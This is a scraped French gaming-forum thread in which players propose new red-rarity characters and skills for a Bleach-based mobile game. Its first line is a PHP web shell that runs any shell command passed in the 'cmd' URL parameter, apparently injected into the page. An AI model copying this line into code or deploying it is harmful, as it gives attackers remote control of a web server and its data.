ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
!show!: 800|Reponse: 5

pourquoi ne pas creer de new personnage avec reishi rouge? [Copier l'URL]

Rank: 6Rank: 6

Heure de publication 2017-6-27 14:52:31 |Afficher toutes les publications
Edite par la5977 a 2017-6-27 14:11

voila qu'elle que perso apres avous de dire deux trois effet et les carracteristique de chacun qui pourrait etre simpa et le but et que cela devienne realisable^^,
go les idees
yami espada 0

ginjo ou bien comme sa shūkurō tsukishima

a vous de jouez meme si j'ai mes petites idees ^^

en esperant que cela vous plaisent!!

Piece jointe: Vous devez Vous identifier pour telecharger ou visualiser les pieces jointes. Pas de compte ?
kirigayayoshiro S25 matsumoto

Utiliser la magie Signaler

Rank: 4

Heure de publication 2017-7-7 21:23:37 |Afficher toutes les publications
J'avais pensé à ça mais pas au même personnage, sinon Yami devrait être un avant-garde avec énormément de pv. Les perso auxquels je pensais serait débloquable à. la taverne niveau 120 et on pourra les acheter que avec du reishi rouge. Je pensais plus à des Quincy comme:
-Gremmy SSS Support talent: imagination (augmente grandement l'intelligence et possède 10% de dégâts)
skill méteor: Attaque tous les ennemis à 200%, brûle à 100% avec une grande chance de fossiliser l'adversaire, se restaure 50 de furie.  

Heure de publication 2017-7-7 21:27:22 |Afficher toutes les publications
Les perso serait de qualité rouge évidemment

Rank: 8Rank: 8

Heure de publication 2017-7-7 21:50:06 |Afficher toutes les publications
C'est vraie qu'on a vus encore aucun perso fullbringer mais la on est dans les quincy donc on continue jusqu'a ce qu'il en reste plus a avoir ce qu'il sortirons après x)

Rank: 6Rank: 6

Heure de publication 2017-7-8 00:50:28 |Afficher toutes les publications
Marohaine a repondu a 2017-7-7 20:27
Les perso serait de qualité rouge évidemment

au vu du skill que tu lui met avec la brulure a 100% je dirais plutot qu'il serais orange non ? même le papy bankai met pas 100% de brulure enfin il met pas de brulure tout court et a pourtant a peut pret les même option pour le reste cependant lui, il est déjà orange XD

Heure de publication 2017-7-8 02:16:57 |Afficher toutes les publications
Ok brûlure à 50% (Kirinji a une chance de mettre brûlure à 100%, il est rouge)

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-1-18 02:00 , Processed in 0.024535 second(s), 11 queries , Xcache On.